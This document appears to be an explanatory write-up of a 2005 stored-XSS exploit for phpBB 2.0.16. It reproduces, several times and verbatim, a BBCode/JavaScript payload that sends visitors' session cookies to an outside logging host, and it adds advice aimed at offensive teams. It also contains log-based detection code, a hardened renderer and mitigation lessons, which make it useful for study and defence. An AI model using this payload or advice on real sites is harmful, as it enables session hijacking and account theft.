Understanding phpBB 2.0.16 XSS for Cookie Disclosure

What this paper is
This paper details a Cross-Site Scripting (XSS) vulnerability in phpBB version 2.0.16. The exploit leverages this vulnerability to steal user cookies by embedding malicious JavaScript within a forum post. When another user views this post, the embedded script executes in their browser, sending their session cookie to a server controlled by the attacker.
Simple technical breakdown
The core of the exploit is a specially crafted HTML/JavaScript snippet. This snippet is designed to be posted as a message on a phpBB forum.
- Malicious HTML/JavaScript: The attacker crafts a message that includes HTML tags with specific styling and JavaScript.
- `this.sss` and `eval()`: The `style='top:expression(eval(this.sss));'` part is a classic Internet Explorer-specific XSS vector. It tells the browser to execute JavaScript stored in the `sss` attribute when the element's `top` style is evaluated.
- `new Image()` and `document.cookie`: The `sss` attribute contains JavaScript code: `i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;`. This code creates a new image object and sets its `src` attribute to a URL. Crucially, it appends the victim's `document.cookie` (their session cookie) to this URL.
- Attacker's Server: The URL `http://www.milw0rm.com/cgi-bin/shell.jpg?` points to a server controlled by the attacker. When the victim's browser tries to load this "image," it actually sends an HTTP GET request to the attacker's server, including the victim's cookie in the query string.
- Cookie Capture: The attacker's server (in this case, `milw0rm.com`) is configured to log incoming requests, effectively capturing the cookie data.
Complete code and payload walkthrough
The provided exploit code is a single block of HTML/JavaScript designed to be embedded within a forum post.
```text
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
```

Let's break down the meaningful parts:
- `[color=#EFEFEF]...[/color]`: This is BBCode, a markup language often used in forums. It sets the text color to a very light gray (#EFEFEF), making the malicious code visually blend in or appear invisible to the user.
- `[url]www.ut[url=...]`: This indicates nested BBCode `[url]` tags. The outer `[url]` is likely intended to wrap the entire malicious link. The inner `[url=...]` is where the actual exploit payload is embedded.
- `www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=...style='font-size:0;`: This is the core of the XSS payload, disguised within HTML attributes.
  - `www.s=''`: This part is a bit unusual. It might be an attempt to create a dummy attribute or a placeholder. The `www.s` itself doesn't have a standard HTML meaning.
  - `style='font-size:0;color:#EFEFEF'`: This applies styles to an element (likely an `<a>` tag implied by the `[url]` BBCode). `font-size:0;` makes the text invisible, and `color:#EFEFEF` further attempts to hide it.
  - `style='top:expression(eval(this.sss));'`: This is the critical Internet Explorer-specific XSS vector.
    - `expression()`: This is a proprietary CSS extension in older versions of Internet Explorer that allows JavaScript execution.
    - `eval(this.sss)`: This tells IE to take the content of the `sss` attribute of the current element (`this`) and execute it as JavaScript code.
  - `` sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null` ``: This is the JavaScript code that will be executed by `eval(this.sss)`.
    - `i=new/**/Image();`: Creates a new JavaScript `Image` object. This object is typically used for preloading images, but here it's used to make an HTTP request. The `/**/` comment stands in for the space that `new Image` needs, so the payload contains no whitespace, and it also helps obfuscate the code.
    - `i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;`: This is the payload delivery mechanism.
      - `i.src`: Sets the source URL for the image object.
      - `'http://www.milw0rm.com/cgi-bin/shell.jpg?'`: This is the attacker's server endpoint. The `.jpg` extension is a common disguise for a script that logs GET requests.
      - `+document.cookie`: This concatenates the victim's browser cookies to the URL. When the browser attempts to load this URL, the cookies are sent as part of the GET request's query string.
    - `this.sss=null`: After the script has executed, it sets the `sss` attribute to `null`. This is a cleanup step, potentially to prevent re-execution or to make the element less conspicuous.
  - `style='font-size:0;'`: Another style to ensure the element is invisible.
- `][/url][/url]`: These are the closing BBCode tags.
Mapping list:
- `[color=#EFEFEF]...[/color]` -> Visually hides the malicious content by setting text color to light gray.
- `[url]...[/url]` -> BBCode for creating a hyperlink, used here to wrap the exploit.
- `[url=...]` -> BBCode for creating a hyperlink with a specific URL, used to embed the exploit payload.
- `style='font-size:0;'` -> Makes the rendered HTML element's text invisible.
- `style='top:expression(eval(this.sss));'` -> Internet Explorer-specific CSS that executes JavaScript from the `sss` attribute.
- `` sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null` `` -> The JavaScript payload that creates an image object and sends the victim's cookies to the attacker's server.
- `i=new/**/Image();` -> Creates a JavaScript Image object.
- `i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;` -> The core cookie exfiltration logic.
- `document.cookie` -> JavaScript property that retrieves the cookies for the current document.
- `http://www.milw0rm.com/cgi-bin/shell.jpg?` -> The attacker-controlled server endpoint designed to log incoming GET requests.
- `this.sss=null` -> Cleans up the `sss` attribute after execution.
Practical details for offensive operations teams
- Required Access Level: Low. This is a stored XSS vulnerability. The attacker only needs the ability to post a message on the phpBB forum. No administrative privileges are required.
- Lab Preconditions:
  - A vulnerable phpBB 2.0.16 installation.
  - A controlled server (e.g., a VPS, a simple web server) configured to log incoming HTTP GET requests. The exploit expects a URL like `http://attacker.com/cgi-bin/shell.jpg?` where `shell.jpg` is a placeholder and the server logs the full query string.
  - The attacker needs to know the target forum's URL.
- Tooling Assumptions:
  - A web browser capable of rendering the BBCode and executing the JavaScript (specifically, older versions of Internet Explorer are targeted by `expression()`). Modern browsers do not support `expression()`.
  - A text editor for crafting the BBCode.
  - A server-side script (e.g., a simple Python Flask app, PHP script, or even just Apache/Nginx logging configuration) to capture the logged cookies.
- Execution Pitfalls:
  - Browser Compatibility: The `expression()` CSS function is an Internet Explorer-only feature. Users with other browsers (Firefox, Chrome, Safari) will not be vulnerable to this specific payload.
  - WAF/IDS Evasion: Modern Web Application Firewalls (WAFs) and Intrusion Detection Systems (IDS) are highly likely to detect and block such payloads, especially the `expression()` and `document.cookie` patterns. Obfuscation techniques might be necessary for older or less sophisticated defenses.
  - BBCode Filtering: The phpBB installation might have filters that sanitize or disallow certain BBCode tags or HTML attributes, preventing the exploit from being posted or rendered correctly.
  - Cookie Expiration/HttpOnly: If the target cookies have the `HttpOnly` flag set, JavaScript cannot access them, rendering this exploit ineffective. Similarly, if cookies have already expired, there's nothing to steal.
  - Attacker Server Availability: The attacker's logging server must be online and accessible when the victim views the post.
  - Payload Delivery: The exploit relies on the victim viewing the crafted post. This might require social engineering or waiting for users to browse the forum.
- Telemetry:
  - Victim's Browser: An HTTP GET request originating from the victim's IP address to the attacker's logging server. The request will contain a URL with the victim's session cookie in the query string.
  - Attacker's Server Logs: The attacker's server will log the incoming GET request, showing the victim's IP, user agent, and the full URL including the stolen cookie.
  - phpBB Server Logs: Potentially, the phpBB server might log the creation of the malicious post. However, the exploit itself doesn't directly interact with the phpBB server in a way that would generate significant, unique logs beyond the post creation.
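The telemetry above is what a defender can hunt for in web-server logs: a GET whose query string is really a cookie jar, with the Referer naming the forum page that served the post. The following is an added detection example, not code from the paper; it parses combined-format access-log lines like the paper's Example Output, and the sample lines, IPs, host name and sid value are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Apache/Nginx "combined" access-log line, the format of the paper's Example Output.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

# Cookie names phpBB 2.x sets with its default cookie prefix (seen verbatim in the paper's log line).
PHPBB_COOKIE_NAMES = ("phpbb2mysql_sid", "phpbb2mysql_data", "phpbb2mysql_t")


def looks_like_cookie_jar(decoded_query: str) -> bool:
    """document.cookie joins pairs with '; '; two or more name=value segments is the tell-tale shape."""
    segments = [s for s in decoded_query.split("; ") if re.match(r"[\w.-]+=", s)]
    return len(segments) >= 2


def classify_query(query: str) -> list:
    """Reasons (possibly none) why a URL-decoded query string looks like exfiltrated cookies."""
    decoded = unquote(query)
    reasons = [name for name in PHPBB_COOKIE_NAMES if name + "=" in decoded]
    if looks_like_cookie_jar(decoded):
        reasons.append("cookie-jar syntax")
    return reasons


def find_cookie_exfil(lines) -> list:
    """Flag log lines whose query string carries cookie data; the Referer names the page hosting the post."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path, _, query = m.group("target").partition("?")
        reasons = classify_query(query) if query else []
        if reasons:
            hits.append({"victim_ip": m.group("ip"), "path": path,
                         "hosting_page": m.group("referer"), "reasons": reasons})
    return hits


# Constructed sample lines modelled on the paper's Example Output (IPs, host and sid are placeholders).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Jul/2005:03:09:13 -0500] "GET /cgi-bin/shell.jpg?phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B%7D;%20phpbb2mysql_sid=00000000000000000000000000000000 HTTP/1.1" 404 305 "http://forum.example/phpBB2/viewtopic.php?t=3"',
    '203.0.113.8 - - [09/Jul/2005:03:10:01 -0500] "GET /images/logo.jpg HTTP/1.1" 200 1024 "http://forum.example/phpBB2/index.php"',
    '203.0.113.9 - - [09/Jul/2005:03:11:45 -0500] "GET /search?q=phpbb&page=2 HTTP/1.1" 200 512 "-"',
]
```

Running `find_cookie_exfil(SAMPLE_LOG)` flags only the first line and returns the Referer, which is the thread (`viewtopic.php?t=3`) a responder should inspect for the malicious post.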
Where this was used and when
This exploit targets phpBB version 2.0.16, which was released around 2005. The exploit paper itself was published on July 8, 2005. Therefore, this type of attack would have been relevant in the mid-2000s. phpBB 2.x was a very popular forum software at the time, making it a common target for web application vulnerabilities. Exploits like this were frequently used by defacement groups and black-hat hackers to gain unauthorized access to user accounts on compromised forums.
Defensive lessons for modern teams
- Input Validation and Sanitization: Always sanitize user-provided input, especially when it's displayed on web pages. This includes stripping or encoding potentially dangerous HTML and JavaScript.
- Content Security Policy (CSP): Implement a strong CSP to restrict the sources from which scripts can be loaded and executed. This can prevent inline scripts and `eval()` from running.
- HttpOnly Cookies: Ensure that sensitive session cookies are marked with the `HttpOnly` flag. This prevents JavaScript from accessing them, mitigating the impact of XSS vulnerabilities.
- Browser Security Features: Keep browsers updated. Modern browsers have built-in XSS filters and protections that can block many older XSS vectors.
- Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common XSS patterns.
- Regular Software Updates: Keep all web applications and their dependencies (like phpBB) updated to the latest secure versions. This vulnerability is specific to an old, unsupported version.
- Awareness Training: Educate users about the risks of clicking on suspicious links or viewing content from untrusted sources.
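The payload walkthrough shows the root cause: the `[url=...]` argument lands inside an HTML attribute, so a value containing a quote can close that attribute and append `style=`/`sss=` attributes of its own. The input-validation lesson above, as an added example that is neither the paper's code nor phpBB's: a simplified Python model of a BBCode link renderer with the weak pattern beside an allowlisting version, fed the inner tag of the payload above and a constructed benign link; `URL_TAG_RE`, `is_safe_link_target` and the sample names are my own.

```python
import html
import re
from urllib.parse import urlsplit

# Simplified model of a BBCode [url=target]text[/url] renderer; not phpBB's own code.
URL_TAG_RE = re.compile(r"\[url=(?P<target>[^\]]*)\](?P<text>.*?)\[/url\]", re.IGNORECASE | re.DOTALL)


def render_unsafe(bbcode: str) -> str:
    """Weak form: the target is dropped into the href attribute unescaped, so a target that
    closes the quote can append its own attributes (style=..., sss=...) to the <a> element."""
    return URL_TAG_RE.sub(lambda m: "<a href='%s'>%s</a>" % (m.group("target"), m.group("text")), bbcode)


def is_safe_link_target(target: str) -> bool:
    """Allowlist: absolute http(s) URL with a host and no quotes, whitespace, angle brackets,
    backticks or control characters anywhere in it."""
    if re.search(r"[\s'\"<>`\x00-\x1f]", target):
        return False
    parts = urlsplit(target)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def render_safe(bbcode: str) -> str:
    """Hardened form: validate the target against the allowlist, then escape both the
    attribute value and the link text; anything rejected is emitted as inert escaped text."""
    def repl(m):
        target, text = m.group("target"), m.group("text")
        if not is_safe_link_target(target):
            return html.escape(m.group(0))
        return '<a href="%s">%s</a>' % (html.escape(target, quote=True), html.escape(text))
    return URL_TAG_RE.sub(repl, bbcode)


# The inner [url=...] tag from the paper's payload, copied as-is to serve as test input.
PAYLOAD_TAG = ("[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'"
               "sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'"
               "+document.cookie;this.sss=null`style='font-size:0;][/url]")
BENIGN_TAG = "[url=http://forum.example/phpBB2/index.php]Forum index[/url]"  # constructed sample
```

`render_unsafe(PAYLOAD_TAG)` reproduces the injected `style='top:expression(...)'` attribute, while `render_safe` rejects the same tag and renders the benign one normally.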
ASCII visual (if applicable)
This exploit is a client-side attack that relies on social engineering (getting users to view a post) and browser rendering. A simple flow diagram can illustrate the cookie exfiltration:
```text
+-----------------+       +-----------------+       +-------------------+
| Victim's Browser| ----> | Malicious Post  | ----> | Attacker's Server |
| (IE < 8)        |       | (phpBB Forum)   |       | (Logging Requests)|
+-----------------+       +-----------------+       +-------------------+
        |                                                      ^
        | 1. Renders HTML/JS                                   |
        | 2. Executes JS (eval(this.sss))                      |
        | 3. Accesses document.cookie                          |
        | 4. Creates Image object                              |
        | 5. Sends GET request with cookie                     |
        |    to attacker.com/cgi-bin/shell.jpg?cookie_data     |
        +------------------------------------------------------+
```

Source references
- Exploit-DB Paper: https://www.exploit-db.com/papers/1095
- Original Source Code: Provided within the paper.
Original Exploit-DB Content (Verbatim)
```text
/*
1) Change milw0rm.com to your domain.com
2) Post the below code into a new message.
Example Output:
***.**.***.*** - - [09/Jul/2005:03:09:13 -0500]
"GET /cgi-bin/shell.jpg?phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D;%20phpbb2mysql_sid=898eeaa6ea3c9848a60121d3450a1287;%20phpbb2mysql_t=a%3A1%3A%7Bi%3A3%3Bi%3A1120845509%3B%7D HTTP/1.1" 404 305 "http://tester/phpBB2/viewtopic.php?t=3"
/str0ke
*/
******************************************************************************************************
* CCTEAM PhpBB 2.0.16 XSS EXPLOIT *
* Powered by D|ablo CCTEAM *
******************************************************************************************************
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
******************************************************************************************************
* http://ccteam.ru/ *
* http://defacers.ru/ *
******************************************************************************************************
# milw0rm.com [2005-07-08]
```